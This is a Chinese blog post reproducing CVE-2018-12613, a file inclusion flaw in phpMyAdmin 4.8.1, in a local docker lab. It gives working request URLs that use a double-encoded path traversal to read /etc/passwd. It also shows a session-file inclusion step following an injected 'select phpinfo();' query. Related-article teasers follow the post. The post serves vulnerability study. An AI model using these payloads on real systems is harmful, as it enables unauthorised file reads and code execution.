[CVE-2018-12613]phpmyadmin4.8.1远程文件包含漏洞复现

最新推荐文章于 2024-04-19 11:56:40 发布
最新推荐文章于 2024-04-19 11:56:40 发布
阅读量530 收藏
点赞数
文章标签: 漏洞利用
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/100175073
版权

漏洞原理:

一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:

$ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码

$ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码

影响版本:phpMyAdmin 4.8.0和4.8.1受到影响。

搭建环境:

1、docker-compose up -d
2、直接访问phpmyadmin对应的端口地址 由于配置模式为’config’模式 所以无需账号 直接登陆界面
3、直接利用
方法一:http://127.0.0.1:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
在这里插入图片描述
方法二:查询一次sql语句 select phpinfo();
然后自己再去包含文件(查看cookie中键phpmyadmin的值再拿来包含)http://127.0.0.1:8080/index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/tmp/sess_16e278c3120d8f7d0122fa4126d0a92a

tips:如果没做过设置,session文件默认是在/var/lib/php/sessions/目录下,文件名是sess_加上你的session字段。(没有权限)
而一般情况下,phpmyadmin的session文件会设置在/tmp目录下,需要在php.ini里把session.auto_start置为1,把session.save_path目录设置为/tmp。

漏洞成因分析:https://www.jianshu.com/p/0d75017c154f

小鱼儿waha
关注
远程文件包含原理及利用
G3et的博客
01-27 764
远程文件包含漏洞的危害在于,攻击者可以通过包含恶意文件来执行任意代码,从而获取服务器的权限、控制服务器或窃取服务器上的敏感信息。为了防范远程文件包含漏洞,应当使用严格的输入验证和过滤机制,确保只允许包含受信任的文件。我们来复现一下,首先准备一个phpinfo,假设把这个phpinfo放到我们自己的服务器,或者上传一个图片马放在任何可以上传的地方等等,只要能访问就行。由于没有对用户提交的文件名进行任何的安全限制,所以攻击者可以通过提交远程服务器上的文件 URL 来包含并执行远程文件。先来看看正常的一个情况。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
File Inclusion(文件包含漏洞)
今天的风儿甚是喧嚣
07-10 677
文件包含漏洞总结
Pickachu第六弹:File Inclusion(文件包含漏洞)
Pisces_mango的博客
09-03 587
目录 一、File Inclusion(local) ​二、File Inclusion(remote) 一、File Inclusion(local) 1.选择一个选项 2.在url中输入../../../../../../../etc/passwd可以读取文件 二、File Inclusion(remote) 可以搭恶意站点,在上面放一个恶意代码上,然后把路径从前端传到后台,后台包含函数会对远程的路径进行加载,可以对目标站点进行远程控制 1.创建恶意代码放在目录下 2.
远程文件包含
Just for fun
10-20 2400
远程文件包含(Remote File Inclusion),简称RFI,与其对应的是本地文件包含(Local File Inclusion,LFI),它们都是通过PHP的包含函数即:require(),require_once(),include()和include_once()来使用。   一般情况下,用户通过包含函数将具有特定功能的函数或类包含到当前脚本中,是没有什么问题的。但是有时候,为...
文件包含漏洞(File Inclusion Vulnerability)
最新发布
qq_69100706的博客
04-19 234
这种漏洞的存在是因为开发人员在代码中处理用户输入时,没有对用户可控制的变量进行充分过滤和检查,导致恶意用户可以通过构造特定请求来包含服务器上的任意文件,甚至远程文件。: 更严重的情况下,如果应用程序允许包含来自互联网上的远程文件,攻击者可以尝试注入一个外部URL地址,使得服务器去下载并执行攻击者服务器上的恶意脚本,从而直接植入后门,实施恶意操作。:在编写包含文件的代码时,使用安全函数或者框架提供的安全机制来包含文件,避免直接拼接用户输入。:遵循安全编程规范,定期进行代码审计,及时发现并修复潜在的安全问题。
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613)
sweetie 的博客
12-06 598
phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613)复现
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
weixin_51387754的博客
12-07 2820
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞环境 执行如下命令,启动phpmyadmin 4.8.1: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。 漏洞复现 访问http://your-ip:8080/index.ph
Weblogic任意文件上传漏洞复现CVE-2018-2894)
懂进攻知防守
07-21 796
Weblogic Web 服务测试客户端,其配置页面存在未授权访问的问题,路径为**/ws_utc/config.do**、**/ws_utc/begin.do。可造成任意文件上传漏洞,文章完整复现漏洞并提供修复建议!
CVE-2018-12613 PHPmyadmin文件包含漏洞
m0_48736242的博客
10-14 739
CVE-2018-12613 PHPmyadmin文件包含漏洞
DVWA使用教程(File Inclusion)(四)
ai_64的博客
06-16 6730
DVWA使用教程(File Inclusion)(四) DVWA是一个用来练习Web渗透的PHP应用。共有十个模块,分别是 1.Brute Force(爆破) 2.Command Injection(命令注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.File Uplod(文件上传) 6.Insecure CAPTCHA(不安全的验证码) 7.SQL...
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 3223
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
phpmyadmin4.8.1漏洞复现-远程文件包含
weixin_54555816的博客
04-10 4570
phpMyAdmin4.8.0 - 4.8.1版本均受漏洞影响。 环境搭建:phpstudy+windows+phpmyadmin4.8.1 注意要将phpmyadmin解压下载到phpstudy网站根目录 像我这里的根目录就是在www目录这里 解压之后再打开localhost/phpMyAdmin 或者127.0.0.1/phpMyAdmin 默认的初始账号和密码都是root,但是由于我之前修改了mysql的密码,所以这个密码就和MySQL的密码一样 然后来到这个phpmyadm.
phpmyadmin 4.8.1 远程文件包含漏洞
永不垂头的博客
08-14 772
phpmyadmin 4.8.1 远程文件包含漏洞 文章目录phpmyadmin 4.8.1 远程文件包含漏洞一、漏洞详情二、漏洞复现1.任意文件包含2.任意代码执行3.向数据库写入php代码4.包函session文件三、我的公众号 一、漏洞详情 首先在index.php 50-67行代码 满足5个条件后就会include$_REQUEST[‘target’]的内容 $_REQUEST[‘target’]不为空 $_REQUEST[‘target’]是字符串 $_REQUEST[‘target’]不
phpMyAdmin后台文件包含漏洞CVE-2018-12613
weixin_47493074的博客
09-17 587
phpMyAdmin文件包含漏洞复现CVE-2018-12613
利用CVE-2018-12613漏洞远程文件包含与加固教程
CVE-2018-12613PHPMyAdmin的一个安全漏洞,允许攻击者通过精心构造的URL参数来执行远程文件包含,从而可能导致敏感信息泄露或者恶意代码执行。 首先,课程中提到了实验环境的设置,包括两台服务器:一台渗透机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值